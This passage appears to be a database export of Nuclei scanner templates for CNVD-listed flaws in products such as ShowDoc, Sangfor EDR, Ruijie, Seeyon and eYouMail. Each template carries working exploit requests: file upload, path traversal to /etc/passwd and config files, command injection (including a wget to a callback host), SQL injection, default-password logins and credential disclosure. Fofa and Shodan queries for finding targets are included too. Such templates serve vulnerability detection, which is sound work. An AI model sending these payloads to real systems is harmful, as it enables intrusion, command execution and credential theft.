Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.\n reference:\n - https://vul.wangan.com/a/CNVD-2020-26585\n - https://blog.csdn.net/qq_48985780/article/details/122211136\n - https://github.com/star7th/showdoc/pull/1059\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\n cvss-score: 9.9\n cwe-id: CWE-434\n metadata:\n verified: true\n max-request: 2\n fofa-query: app=\"ShowDoc\"\n tags: cnvd,cnvd2020,showdoc,fileupload,intrusive\nvariables:\n str1: \"{{randstr}}\"\n\nhttp:\n - raw:\n - |\n POST /index.php?s=/home/page/uploadImg HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633\n\n ----------------------------835846770881083140190633\n Content-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{randstr}}.<>txt\"\n Content-Type: text/plain\n\n {{str1}}\n ----------------------------835846770881083140190633--\n - |\n GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - body_2 == str1\n condition: and\n\n extractors:\n - type: regex\n name: date\n part: body\n group: 1\n regex:\n - '(\\d{4}-\\d{2}-\\d{2})\\\\/([a-f0-9]+\\.txt)'\n internal: true\n\n - type: regex\n name: file\n part: body\n group: 2\n regex:\n - '(\\d{4}-\\d{2}-\\d{2})\\\\/([a-f0-9]+\\.txt)'\n internal: true\n\n# digest: 4a0a00473045022062cd2c2372723a192107237f88061ef28ac914b37b54a0221127375e1ffce96c0221009f238b324e1dc2027171daa5c91398f44270177f799e5bef425529f795d8f979:922c64590222798bb761d5b6d8e72950\n", "hash": "80ac57e63fd5ae3e9186cb5216b4a9a4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0a" }, "name": "CNVD-2020-46552.yaml", "content": "id: CNVD-2020-46552\n\ninfo:\n name: Sangfor EDR - Remote Code Execution\n author: ritikchaddha\n severity: critical\n description: Sangfor Endpoint Monitoring and Response 
Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.\n reference:\n - https://www.modb.pro/db/144475\n - https://blog.csdn.net/bigblue00/article/details/108434009\n - https://cn-sec.com/archives/721509.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,sangfor,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php\"\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body, \"$show_input = function($info)\")'\n - 'contains(body, \"$strip_slashes($host)\")'\n - 'contains(body, \"Log Helper\")'\n - 'status_code == 200'\n condition: and\n\n# digest: 4a0a0047304502202862eba6aef622b1dae0bcb4e023f3454a7d9bafa253edded09bef38bbf64713022100e4f0118515d3ce26dfb977df1e3bb9a11401d1b113b5842311bcadea68b213bc:922c64590222798bb761d5b6d8e72950\n", "hash": "2f71d659afad741bd4f1f1698721259c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0b" }, "name": "CNVD-2020-56167.yaml", "content": "id: CNVD-2020-56167\n\ninfo:\n name: Ruijie Smartweb - Default Password\n author: pikpikcu\n severity: low\n description: Ruijie Smartweb contains a vulnerability via the default password. 
An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167\n - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,ruijie,default-login\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/WEB_VMS/LEVEL15/\"\n\n headers:\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n\n body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Level was: LEVEL15\"\n - \"/WEB_VMS/LEVEL15/\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220206f707c972c341622e8e5037848470fb78807b3dc49619bb3724e11e55efd750221009b249e3c56ef9025b5f50eff649dbcf9a7d8cdee87aca961f8932f8300e8372e:922c64590222798bb761d5b6d8e72950", "hash": "335bb01e2376f5612aeec3874e89d534", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0c" }, "name": "CNVD-2020-62422.yaml", "content": "id: CNVD-2020-62422\n\ninfo:\n name: Seeyon - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Seeyon is vulnerable to local file inclusion.\n reference:\n - https://blog.csdn.net/m0_46257936/article/details/113150699\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,lfi,seeyon\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties\"\n\n matchers-condition: and\n matchers:\n - type: status\n status:\n - 200\n\n - type: word\n part: header\n words:\n - \"application/x-msdownload\"\n condition: and\n\n - type: word\n part: body\n words:\n - \"ctpDataSource.password\"\n condition: and\n# digest: 
4a0a0047304502201f896e58e7e2664e2640d78f636e25624c0d2baf53976cc8494b1e2dc5e68f97022100baf24b5ae58e69e58cfc79a0a78fb0afe39e8dc78e4797bb1890f40c2b102094:922c64590222798bb761d5b6d8e72950", "hash": "e47e625491662e281bb53cd7107887df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0d" }, "name": "CNVD-2020-63964.yaml", "content": "id: CNVD-2020-63964\n\ninfo:\n name: jshERP - Information Disclosure\n author: brucelsone\n severity: high\n description: |\n jshERP can reveal sensitive information, including system credentials, without requiring any credentials.\n reference:\n - https://cn-sec.com/archives/1798444.html\n metadata:\n max-request: 1\n shodan-query: http.favicon.hash:-1298131932\n fofa-query: jshERP-boot\n tags: cnvd,cnvd2020,jsherp,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jshERP-boot/user/getAllList;.ico\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"username\":'\n - '\"loginName\":'\n - '\"password\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950", "hash": "984edb1bc42d8dce432c7d4ba3530053", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0e" }, "name": "CNVD-2020-67113.yaml", "content": "id: CNVD-2020-67113\n\ninfo:\n name: H5S CONSOLE - Unauthorized Access\n author: ritikchaddha\n severity: medium\n description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.\n reference:\n - https://vul.wangan.com/a/CNVD-2020-67113\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-425\n metadata:\n verified: true\n max-request: 2\n shodan-query: http.title:\"H5S CONSOLE\"\n tags: 
cnvd,cnvd2020,h5s,unauth,h5sconsole\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/GetSrc\"\n - \"{{BaseURL}}/api/v1/GetDevice\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'strUser'\n - 'strPasswd'\n condition: and\n\n - type: word\n part: body\n words:\n - 'H5_AUTO'\n - 'H5_DEV'\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n\n# digest: 4a0a004730450221009699239931e6e4becf71892aeb11692cfd9d64a3ab68b722b6ac11bd2145932b02200ebc3e717d8f7e13284940a74c6e295db280a0da787c8cb68551251918bbc153:922c64590222798bb761d5b6d8e72950\n", "hash": "dce8d7e7593c44dc725b06f317465ce0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0f" }, "name": "CNVD-2020-68596.yaml", "content": "id: CNVD-2020-68596\n\ninfo:\n name: WeiPHP 5.0 - Path Traversal\n author: pikpikcu\n severity: high\n description: WeiPHP 5.0 is susceptible to directory traversal attacks.\n reference:\n - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cwe-id: CWE-22\n metadata:\n max-request: 3\n tags: cnvd,cnvd2020,weiphp,lfi\n\nhttp:\n - raw:\n - |\n POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n \"1\":1\n - |\n GET /public/index.php/home/file/user_pics HTTP/1.1\n Host: {{Hostname}}\n - |\n GET {{endpoint}} HTTP/1.1\n Host: {{Hostname}}\n\n extractors:\n - type: regex\n name: endpoint\n part: body\n internal: true\n regex:\n - '/public/uploads/picture/(.*.jpg)'\n matchers:\n - type: word\n part: body\n words:\n - https://weiphp.cn\n - WeiPHP\n - DB_PREFIX\n condition: and\n# 
digest: 490a004630440220510a1de2daebb2a7cd068ca47f43ea4d9c42ee75ecf84d60422c38a1b62e92910220712a48b29bb2d311b699983ccc765ab83b4468a09eb60a6ff65aa71d59b18e07:922c64590222798bb761d5b6d8e72950", "hash": "3bbc20459a047fa875ad93a0987690eb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e10" }, "name": "CNVD-2021-01931.yaml", "content": "id: CNVD-2021-01931\n\ninfo:\n name: Ruoyi Management System - Local File Inclusion\n author: daffainfo,ritikchaddha\n severity: high\n description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.\n reference:\n - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cwe-id: CWE-22\n metadata:\n max-request: 2\n tags: cnvd,cnvd2021,ruoyi,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd\"\n - \"{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini\"\n\n matchers-condition: or\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0\"\n\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022100e3979047134fe0ca6dd999adbf3bc63b9fd991c76bc1e85565c6ff8156e7d22b0220711ac9bdbb8a0ec31179b9da419ffd9122883f6c0fefd77a9b663e1656f8d5ec:922c64590222798bb761d5b6d8e72950", "hash": "b3384333f98dc9c3facafbca712534a5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e11" }, "name": 
"CNVD-2021-09650.yaml", "content": "id: CNVD-2021-09650\n\ninfo:\n name: Ruijie Networks-EWEB Network Management System - Remote Code Execution\n author: daffainfo,pikpikcu\n severity: critical\n description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.\n reference:\n - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/\n - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py\n - https://www.ruijienetworks.com\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd,cnvd2021,ruijie,rce\n\nhttp:\n - raw:\n - |\n POST /guest_auth/guestIsUp.php\n Host: {{Hostname}}\n\n mac=1&ip=127.0.0.1|wget {{interactsh-url}}\n\n unsafe: true\n matchers:\n - type: word\n part: interactsh_protocol\n name: http\n words:\n - \"http\"\n# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950", "hash": "c22989bf81b080c321e34d729b2e79cd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e12" }, "name": "CNVD-2021-10543.yaml", "content": "id: CNVD-2021-10543\n\ninfo:\n name: EEA - Information Disclosure\n author: pikpikcu\n severity: high\n description: EEA is susceptible to information disclosure including the username and password.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: cnvd,cnvd2021,config,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/authenticationserverservlet\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"(.*?)\"\n - \"(.*?)\"\n condition: and\n\n - type: status\n 
status:\n - 200\n# digest: 4a0a00473045022100ecc765b8bba511bf3767eae8e50a444efb9c1a0e97670478282296ddb39b59b4022021e4eda9da996981443cdb0e1b6ed5d469c9ce61f93f743153294c57c8a3c3cb:922c64590222798bb761d5b6d8e72950", "hash": "3559be564b552298117307ebd6a2d5b1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e13" }, "name": "CNVD-2021-14536.yaml", "content": "id: CNVD-2021-14536\n\ninfo:\n name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure\n author: daffainfo\n severity: high\n description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.\n reference:\n - https://www.adminxe.com/2163.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n cvss-score: 8.3\n cwe-id: CWE-522\n metadata:\n max-request: 1\n fofa-query: title=\"RG-UAC登录页面\"\n tags: cnvd2021,cnvd,ruijie,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/get_dkey.php?user=admin\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"pre_define\"'\n - '\"auth_method\"'\n - '\"name\"'\n - '\"password\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n part: body\n group: 1\n regex:\n - '\"role\":\"super_admin\",([\"a-z:,0-9]+),\"lastpwdtime\":'\n# digest: 490a00463044022046fa27ed559165bee99e3f0591f1ca5ee488637fb236c6b1c81fe49ee2c93865022045c885a0df3ac7a1fbada587a1785a09b40212dc68eeb662117a4e7bccac59d5:922c64590222798bb761d5b6d8e72950", "hash": "477c6fe9aa37fe3acc7f98ac7e864a56", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e14" }, "name": "CNVD-2021-15822.yaml", "content": "id: CNVD-2021-15822\n\ninfo:\n name: ShopXO Download File Read\n author: pikpikcu\n 
severity: high\n description: |\n ShopXO is an open source enterprise-level e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.\n reference:\n - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog\n metadata:\n verified: true\n max-request: 1\n shodan-query: title:\"ShopXO企业级B2C电商系统提供商\"\n fofa-query: app=\"ShopXO企业级B2C电商系统提供商\"\n tags: cnvd2021,cnvd,shopxo,lfi\n\nhttp:\n - raw:\n - |\n GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950", "hash": "c8457b6ec38fa90c34261be49843adf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e15" }, "name": "CNVD-2021-15824.yaml", "content": "id: CNVD-2021-15824\n\ninfo:\n name: EmpireCMS DOM Cross Site-Scripting\n author: daffainfo\n severity: high\n description: EmpireCMS is vulnerable to a DOM-based cross-site scripting attack.\n reference:\n - https://sourceforge.net/projects/empirecms/\n - https://www.bilibili.com/read/cv10441910\n - https://vul.wangan.com/a/CNVD-2021-15824\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-79\n metadata:\n max-request: 1\n tags: cnvd2021,cnvd,empirecms,xss,domxss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'if(Request(\"url\")!=0)'\n - 'href=\\\"\"+Request(\"url\")+\"\\\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950", "hash": "d5e755f57c39fbba56dec8670baf023c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e16" }, "name": "CNVD-2021-17369.yaml", "content": "id: CNVD-2021-17369\n\ninfo:\n name: Ruijie Smartweb Management System Password Information Disclosure\n author: pikpikcu\n severity: high\n description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n cvss-score: 8.3\n cwe-id: CWE-522\n metadata:\n max-request: 1\n tags: cnvd2021,cnvd,ruijie,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web/xml/webuser-auth.xml\"\n\n headers:\n Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100886e90d197472436d75225cc8b4cebd18cec299c739d5334b39489a60ec706a7022100e079763c5199ba85db214a9209c815bbd097a810731cad5f9d16f3db8222334b:922c64590222798bb761d5b6d8e72950", "hash": "215266e206ea6b00a7b7c26dc131d0b1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e17" }, "name": "CNVD-2021-26422.yaml", "content": "id: CNVD-2021-26422\n\ninfo:\n name: eYouMail - Remote Code Execution\n author: daffainfo\n severity: critical\n description: eYouMail is susceptible to a remote code execution vulnerability.\n reference:\n - 
https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py\n - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd2021,cnvd,eyoumail,rce\n\nhttp:\n - raw:\n - |\n POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n type='|cat /etc/passwd||'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f181d46d3d2e74819331b2a4169b01efb1d42df2e201f60831c779070550f51202207ef66ae62f3d77d753c0ae17e60e999d8f75ed523804e98102f673e59b2a124c:922c64590222798bb761d5b6d8e72950", "hash": "34198feb8922f79bf95bb46bb05aab7b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e18" }, "name": "CNVD-2021-28277.yaml", "content": "id: CNVD-2021-28277\n\ninfo:\n name: Landray-OA - Local File Inclusion\n author: pikpikcu,daffainfo\n severity: high\n description: Landray-OA is susceptible to local file inclusion.\n reference:\n - https://www.aisoutu.com/a/1432457\n - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cwe-id: CWE-22\n metadata:\n max-request: 2\n fofa-query: app=\"Landray OA system\"\n tags: cnvd,cnvd2021,landray,lfi\n\nhttp:\n - raw:\n - |\n POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n var={\"body\":{\"file\":\"file:///etc/passwd\"}}\n - |\n POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n 
Content-Type: application/x-www-form-urlencoded\n\n var={\"body\":{\"file\":\"file:///c://windows/win.ini\"}}\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n - \"for 16-bit app support\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b98b4479ab9f48943be02a1d2b3a0cebe9d3d5389705d58d3d7ca1f306dcdebc022100d07fed00db3b41b001193fcbaf37522bdd576917c02364b840beb62c96d46a32:922c64590222798bb761d5b6d8e72950", "hash": "0bb980283b2fc0a4d37654f4a1a2d76a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e19" }, "name": "CNVD-2021-30167.yaml", "content": "id: CNVD-2021-30167\n\ninfo:\n name: UFIDA NC BeanShell Remote Command Execution\n author: pikpikcu\n severity: critical\n description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.\n reference:\n - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A\n - https://www.cnvd.org.cn/webinfo/show/6491\n - https://chowdera.com/2022/03/202203110138271510.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 2\n tags: cnvd2021,cnvd,beanshell,rce,yonyou\n\nhttp:\n - raw:\n - | #linux\n POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n bsh.script=exec(\"id\");\n - | #windows\n POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n bsh.script=exec(\"ipconfig\");\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"uid=\"\n - \"Windows IP\"\n condition: or\n\n - type: word\n words:\n - \"BeanShell Test Servlet\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402204c68147fa92e08857a6c0b79bd9fec56f4e80397bd5f67365061730b8c35507502200dab5a42e472ba22b293104ee2b265e9a14995ac4e38a11db07f2e41e599d6fa:922c64590222798bb761d5b6d8e72950", "hash": "e4edebec8328548118f771ba50712630", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1a" }, "name": "CNVD-2021-32799.yaml", "content": "id: CNVD-2021-32799\n\ninfo:\n name: 360 Xintianqing - SQL Injection\n author: SleepingBag945\n severity: high\n description: |\n The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information.\n reference:\n - https://blog.51cto.com/u_9691128/4295047\n - https://www.cnvd.org.cn/patchInfo/show/270651\n - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml\n metadata:\n verified: true\n max-request: 1\n fofa-query: app=\"360新天擎\"\n tags: cnvd2021,cnvd,360,xintianqing,sqli\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/dp/rptsvcsyncpoint?ccid=1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"reason\":'\n - '\"success\"'\n - '\"antiadwa\":'\n - '\"clientupgrade\":'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206afa5e0d4549835bc2d4c5fb006f2fce414e37201594e6248fd2f11bd4b63b68022100b8de4f954a677c82dbcdbbc13d9201237fdfada40ff00767c561af267d0c1097:922c64590222798bb761d5b6d8e72950", "hash": "fbcaf09b29e318cdce3e5218a1edf33b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1b" }, "name": "CNVD-2021-33202.yaml", "content": "id: CNVD-2021-33202\n\ninfo:\n name: OA E-Cology LoginSSO.jsp - SQL Injection\n author: SleepingBag945\n severity: high\n description: |\n e-cology is an OA office system specially produced for large and medium-sized enterprises. 
It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.\n reference:\n - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md\n - https://www.cnblogs.com/0day-li/p/14637680.html\n metadata:\n verified: true\n max-request: 1\n fofa-query: app=\"泛微-协同办公OA\"\n tags: cnvd2021,cnvd,e-cology,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202c3b8ac764f980a41094f1c98193a9080c65ceaff64975f42b69ef53477bb196022100bb0b3e66abdc94f608aefecaf03255af930789468009df696c1eedb8dff2d283:922c64590222798bb761d5b6d8e72950", "hash": "e858c6a2c9a7f5686630ecfce3c8ed53", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1c" }, "name": "CNVD-2021-41972.yaml", "content": "id: CNVD-2021-41972\n\ninfo:\n name: AceNet AceReporter Report - Arbitrary File Download\n author: DhiyaneshDk\n severity: high\n description: |\n All firewall devices that use the AceNet AceReporter report component can download arbitrary files\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972\n - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.favicon.hash:-1595726841\n fofa-query: body=\"Login @ Reporter\"\n tags: cnvd2021,cnvd,acenet,acereporter,lfi\nvariables:\n filename: 
